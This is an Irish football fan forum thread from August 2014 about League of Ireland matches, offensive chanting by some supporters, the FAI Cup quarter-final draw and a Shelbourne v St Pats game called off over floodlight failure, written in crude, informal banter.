It was outside, not sure if was sung inside! There was a bit of a standoff kinda thing going on, as I got closer shels fans were singing "all the way to Poland to take a heart attack" I flipped meself, I'm not one to get involved in that rubbish either!

IF that's the craic both sets of supporters were at they should play it behind closed doors.

Date Posted: 23 Aug 2014 at 12:37pm
Who did Malahide sign preseason,he had an unsuccessful spell across the water?
Local lad who played schoolboy with them
His name escapes me

Posted By: KingswoodRover
Date Posted: 23 Aug 2014 at 1:17pm
There are complete lowlife's following a lot of clubs. Our lowlife's had a little ditty down in Cobh the night we won Div 1 praising the young guy that tragically killed his neighbour, i was ashamed to be in the same ground as them. Herd mentality, Drink and disco biscuits not conduicve to making good ethical choices.

Date Posted: 23 Aug 2014 at 1:52pm
That song wasn't sung in the ground in Cobh though, was it?

Date Posted: 23 Aug 2014 at 2:05pm
I have been in an around some of the more riff-raffy shelbourne fans on occasions. They are definitely a turn off for the club. Sometimes you just look around and say to yourself "If I were to bump into these people away from a football match, they would probably try to rob me". The skanger element gets brushed under the carpet in the LOI. Why would anybody want to be associated with these people?

Date Posted: 23 Aug 2014 at 2:10pm
Good result Rovers . Think we will get sharper under Nutsy - need to. Great goals and Gary Mac"s shouldnt be missed Monday night on the telly . 

Date Posted: 23 Aug 2014 at 4:30pm

That song wasn't sung in the ground in Cobh though, was it?

Fraid so RTID in the little shed behind the goal sorry to say.

Date Posted: 23 Aug 2014 at 4:34pm
Have to totally disagree with "the skanger element gets  brushed under the carpet" Every little incident in Irish football seems to be sensationalised in all forms of media in this country.

Date Posted: 23 Aug 2014 at 4:59pm

Sorry to hear that joey, breaks my heart to see coonts like that follow Shels and any other club for that matter. Unfortunately all clubs seem to have their element, songs about Ollie Byrne heard many a time in Tolka etc by Pats 'fans'. No excuse for it at all

I didn't see any hassle before or after the game. Hopefully these clowns behave themselves on Tuesday

Posted By: Cabs88
Date Posted: 23 Aug 2014 at 7:42pm
Lost 3 nil to rovers but truth be told probably didn't deserve to lose by 3. We played well at times but the difference was rovers took their chances, their second goal a terrific strike. Hopefully we'll be back up playing the first rovers team next year. Thought turn to our next game, Shelbourne next week is crucial for us.

Beidh lá eile ag an bPaorach

Date Posted: 23 Aug 2014 at 7:46pm

Sorry to hear that joey, breaks my heart to see coonts like that follow Shels and any other club for that matter. Unfortunately all clubs seem to have their element, songs about Ollie Byrne heard many a time in Tolka etc by Pats 'fans'. No excuse for it at all

I didn't see any hassle before or after the game. Hopefully these clowns behave themselves on Tuesday

No need to be sorry pal, iv mates who follow shels I know ye all ain't the same :)

Know the Ollie songs meself, 2 wrongs etc

Posted By: brissy
Date Posted: 23 Aug 2014 at 11:35pm
Always thought shels were the best behaved fans in Dublin.
Must have a new crowd of lads, read about the shels fan who put the cork kid in a coma. Not in to it my self but bohs and rovers could give them the slaps varly handy.

Posted By: Madferret
Date Posted: 24 Aug 2014 at 10:57am

In context a bit, that applause happened literally 5mins after they had being singing about Chris, people were very upset and angry at the time, it was only the section that Chris stood in that turned there back, myself included(although I regret it now I won't apologise for it) and there was no boos or that sort of stuff for it!

I can understand sometimes minutes silence get interrupted unintentionally by people unaware when making their way into a ground. 
But what is it in recent years with this type of filth taking pleasure in other people's tragedy and death, mocking people they don't even know?? We had similar from a few bitter goons on an RIP thread here recently. There really is some dysfunctional & immature small-minded shítebags out there Confused

Date Posted: 25 Aug 2014 at 1:31pm

IF that's the craic both sets of supporters were at they should play it behind closed doors.

Due to a handful of supporters? Come off it SHH, the alleged singing by Shels happened outside the ground as well, no suggestion it was inside as of yet

Date Posted: 25 Aug 2014 at 1:56pm

Due to a handful of supporters? Come off it SHH, the alleged singing by Shels happened outside the ground as well, no suggestion it was inside as of yet

Agree, no chance it would happen

Date Posted: 25 Aug 2014 at 2:54pm
Any chance of Bohs and Cork not going ahead tonight wanna head down to this?

Date Posted: 25 Aug 2014 at 8:26pm
Bohemians 1 - 0 Cork City
39' - Goal - Dinny Corcoran scores for Bohemians.

Date Posted: 25 Aug 2014 at 9:46pm
Decent win for Bohs, a cup run would be nice

Posted By: St.Pauli Reloaded 2
Date Posted: 25 Aug 2014 at 9:51pm
Originally posted by BohsinMunich BohsinMunich wrote:

Bohemians 1 - 0 Cork City
39' - Goal - Dinny Corcoran scores for Bohemians.
CoolCoolCool

In Martin and Roy we Trust !

Date Posted: 25 Aug 2014 at 11:05pm
Bohs have two good young players in Wearen & Devaney.

Potential of some mouth watering QFs

Rovers v Bohs?
Derry v Harps?
Drogs v Dudnalk?
Pats (Shels missed their chance) v non-league?

Date Posted: 25 Aug 2014 at 11:12pm
Originally posted by Cabs88 Cabs88 wrote:

Lost 3 nil to rovers but truth be told probably didn't deserve to lose by 3. We played well at times but the difference was rovers took their chances, their second goal a terrific strike. Hopefully we'll be back up playing the first rovers team next year. Thought turn to our next game, Shelbourne next week is crucial for us.

Best of luck for the rest of the season. Longford are a club going in the right direction on & off the pitch. Got to know Tony Cousins from him delivering to me old job, a sound man under a bit of pressure given the investment, would like to see L'ford back in the Premier. They would do well crowd wise from away support given their central location. 

Good to see Ricer still held in high regard at Tallaght, like Tony another Hoops Legend Clap 

Date Posted: 25 Aug 2014 at 11:23pm
Really looking forward to the game tomorrow night, same as Friday a hammering is what I want to see dished out but anything can happen in this tie!

Should be a tasty atmosphere too

Date Posted: 26 Aug 2014 at 5:10pm
1/4 final draw

Shelbourne/St Pats v Bohemians
Drogheda United v Derry
Shamrock Rovers v Dundalk
Avondale United/ St Michael's v Finn Harps

Date Posted: 26 Aug 2014 at 5:33pm
Would have loved to have gotten the sheep shaggers but maybe in the quarters given their draw . Drogs away will be tough - they have been a bit of a bogey team for us

Date Posted: 26 Aug 2014 at 7:20pm
some tasty ties there

Date Posted: 26 Aug 2014 at 8:05pm
game called off here in tolka due to dodgy floodlight

Date Posted: 26 Aug 2014 at 8:15pm
Jaysus

Date Posted: 26 Aug 2014 at 9:01pm
Nightmare - anyone hear what date this game is now gonna be played?

Date Posted: 26 Aug 2014 at 9:20pm
not a dodgy floodlight, half of them Angry
I reckon it'll be played next Monday or Tuesday. Suits Shels with game game Friday.
Teams were literally about to walk out on to the pitch. Didn't notice the lights on way in but surely they put them on at same time as teams warming up. Very frustrating 

Date Posted: 26 Aug 2014 at 9:34pm
Was it saint? Myself and guf were Sat behind one that sort of exploded, had smoke coming out of it, fourth official had a look at it then and said if you can't fix it, game is off

Some shels lad was Tryna fix it with a jug of water!

Posted By: Dukla
Date Posted: 26 Aug 2014 at 9:46pm
Disaster

Showed up slightly late & the ticket stall had just closed. Lucky I didn't get a ticket cause I wont get a proper chance to head to Tolka for a few weeks now.

Date Posted: 26 Aug 2014 at 9:51pm

Was it saint? Myself and guf were Sat behind one that sort of exploded, had smoke coming out of it, fourth official had a look at it then and said if you can't fix it, game is off

The box must have exploded but it put the 2 sets of lights on main stand at Ballybough and on 2 sets on riverside at Drumcondra end out.
That's quality, put an electrical fire out with water

Date Posted: 26 Aug 2014 at 10:06pm
Was gas! Everyone was saying what an eejit he was but sure nobody said a thing as we all wanted to see him do it!

Suits beside us knew it was over well before was announced, think they were just positioning stewards and the gardai

Posted By: The U
Date Posted: 26 Aug 2014 at 10:08pm

Nightmare - anyone hear what date this game is now gonna be played?

Monday

Date Posted: 26 Aug 2014 at 10:15pm
Originally posted by The Saint The Saint wrote:

1/4 final draw

Drogheda United v Derry

Some great SF's in prospect too. 

Pats/Shels/Bohs v Rovers or Derry v Harps or Drogs v Dundalk.

Horrid journey for Harps but great draw. 

Happy with home draw ourselves, Dundalk might be more concerned with another trophy.

Date Posted: 26 Aug 2014 at 10:21pm

That Ice bucket challenge baloney has a lot to answer for.

In all seriousness tho, we really need to get our act together. 18 holes of golf at Dalymount and not enough light bulbs at Tolka, shíte like this haemorrhage's existing fans and put's off potential support. 
The operating procedures to decide if a match gets the go ahead or not and how those decisions are arrived at needs urgent and systematic overhaul.

Date Posted: 26 Aug 2014 at 11:48pm
Originally posted by Madferret Madferret wrote:

1/4 final draw

Drogheda United v Derry

Pats/Shels/Bohs v Rovers or Derry v Harps or Drogs v Dundalk.

Horrid journey for Harps but great draw. 

Happy with home draw ourselves, Dundalk might be more concerned with another trophy.
I certainly would have taken it before the draw. Great chance of a semi final, but a lot of pressure on us to beat them so hopefully the players are properly focussed...Will be a strange experience for a cup quarter final in a small local ground

Date Posted: 26 Aug 2014 at 11:58pm

1/4 final draw

<span style="font-family: 'Gotham Narrow SSm', sans-serif; line-height: 32px; white-space: pre-wrap;">Shelbourne/St Pats v Bohemians</span>
<span style="color: rgb41, 47, 51; font-family: 'Gotham Narrow SSm', sans-serif; line-height: 32px; white-space: pre-wrap;">Drogheda United v Derry </span>
<span style="color: rgb41, 47, 51; font-family: 'Gotham Narrow SSm', sans-serif; line-height: 22px; white-space: pre-wrap;">Shamrock Rovers v Dundalk</span>
<span style="color: rgb41, 47, 51; font-family: 'Gotham Narrow SSm', sans-serif; line-height: 32px; white-space: pre-wrap;">Avondale United/ St Michael's v Finn Harps</span>

Pats/Shels/Bohs v Rovers or De<span style="line-height: 1.4;">rry v Harps or Drogs v Dundalk.</span>
<span style="line-height: 1.4;">
</span>
<span style="line-height: 1.4;">Horrid journey for Harps but great draw. </span>
<span style="line-height: 1.4;">
</span>
<span style="line-height: 1.4;">Happy with home draw ourselves, Dundalk might be more concerned with another trophy.</span>

I certainly would have taken it before the draw. Great chance of a semi final, but a lot of pressure on us to beat them so hopefully the players are properly focussed...Will be a strange experience for a cup quarter final in a small local ground
Thought Harps were drawn away.....seriously love to see you get through. Great draw for the Hoops as well.

Posted By: Joe Stalin
Date Posted: 27 Aug 2014 at 12:19am
Interesting QF draw though would have liked to have seen Rovers and Dundalk kept apart until later - would have made  cracking final.

Would love to see Bohs win out though - have had a sh*te last few years

Date Posted: 27 Aug 2014 at 12:30am
The two incidents over the past two weeks have really painted North Dublin football in a bad light

#bringbacksportingfingal

Posted By: KevinM
Date Posted: 27 Aug 2014 at 1:06am
Apparently it was the generator that blew, but surely that wouldnt have an effect if they were running it off mains! or am I just an idiot, only going off what two electrians beside me told me but they are ex-electricians 

Date Posted: 27 Aug 2014 at 1:09am
Originally posted by KevinM KevinM wrote:

Apparently it was the generator that blew, but surely that wouldnt have an effect if they were running it off mains! or am I just an idiot, only going off what two electrians beside me told me but they are ex-electricians 

Ex-electricians are the last people to be trusted on this. Probably hermaphrodites too.

Date Posted: 27 Aug 2014 at 8:30am

In all seriousness tho, we really need to get our act together. 18 holes of golf at Dalymount and not enough light bulbs at Tolka, shíte like this haemorrhage's existing fans and put's off potential support. 
The operating procedures to decide if a match gets the go ahead or not and how those decisions are arrived at needs urgent and systematic overhaul.
I don't think you can blame the match officials, if a generator goes pop and the floodlights are knocked off and smoking, the game is off. All this proves is two kips within a mile of each other that can't host the bigger Dublin teams should be levelled and them groundshare in Lusk. The FAI should give them one year to fix their stadia or force the move.

Posted By: Cabs88
Date Posted: 27 Aug 2014 at 10:45am
Hopefully the floodlights are ready for Friday night.... massive game in the first division.We go there 3 points clear with 6 games remaining..shels will benefit from not having a cup game in the lead up to the game.

Beidh lá eile ag an bPaorach

Date Posted: 27 Aug 2014 at 10:58am
Shels not giving out refunds to pats fans last night has to be some sort of scam, they know not everyone who went last night can go again next Monday! Joke of a club!

Didn't see the shels 11 but Dempsey and a few others were the the cat and cage 20 mins before kick off lead to some thinking shels didn't wanna play last night

Date Posted: 27 Aug 2014 at 11:12am

Shels not giving out refunds to pats fans last night has to be some sort of scam, they know not everyone who went last night can go again next Monday! Joke of a club!

Didn't see the shels 11 but Dempsey and a few others were the the cat and cage 20 mins before kick off lead to some thinking shels didn't wanna play last night

Dempsey wasn't in the squad

Date Posted: 27 Aug 2014 at 12:44pm
So will Pats fans have to shell out again monday ???. 

Date Posted: 27 Aug 2014 at 12:50pm
Originally posted by EastStandMan EastStandMan wrote:

So will Pats fans have to shell out again monday ???. 

Oh EastStand you were so close mate, so close! 

One less "L" and "King of the Puns" Clonboy would have asked for the ride.

Date Posted: 27 Aug 2014 at 12:55pm
Definitely suits shels better to play next Monday. Big game for them Friday.
In relation to refunds in fairness to them it would have been a nightmare last night with people queuing for ages and them not having the right change to give to people

Date Posted: 27 Aug 2014 at 1:07pm

In relation to refunds in fairness to them it would have been a nightmare last night with people queuing for ages and them not having the right change to give to people

Anyone who wanted a refund for an event that they just paid into and was called off should have got one! It dosent effect me as I can make next Monday, plenty can't though

Date Posted: 27 Aug 2014 at 1:08pm

Dempsey wasn't in the squad

Why not? Where shels playing a second team? The lad who plays up front was with him normally plays? Lee something?

Either way suits shels playing Monday instead

Date Posted: 27 Aug 2014 at 1:13pm

What, they'd no change to give out either???!! Was the roof still on the stand or did cash converters get that?? What the fcuk is goin on over in that place atall atall??? 

Poor Ollie be mowing circles in heaven.

Date Posted: 27 Aug 2014 at 1:34pm

What, they'd no change to give out either???!! Was the roof still on the stand or did cash converters get that?? What the fcuk is goin on over in that place atall atall??? 

Poor Ollie be mowing circles in heaven.

i'm not saying they shouldn't have offered refunds last night just wouldn't have been easily logistically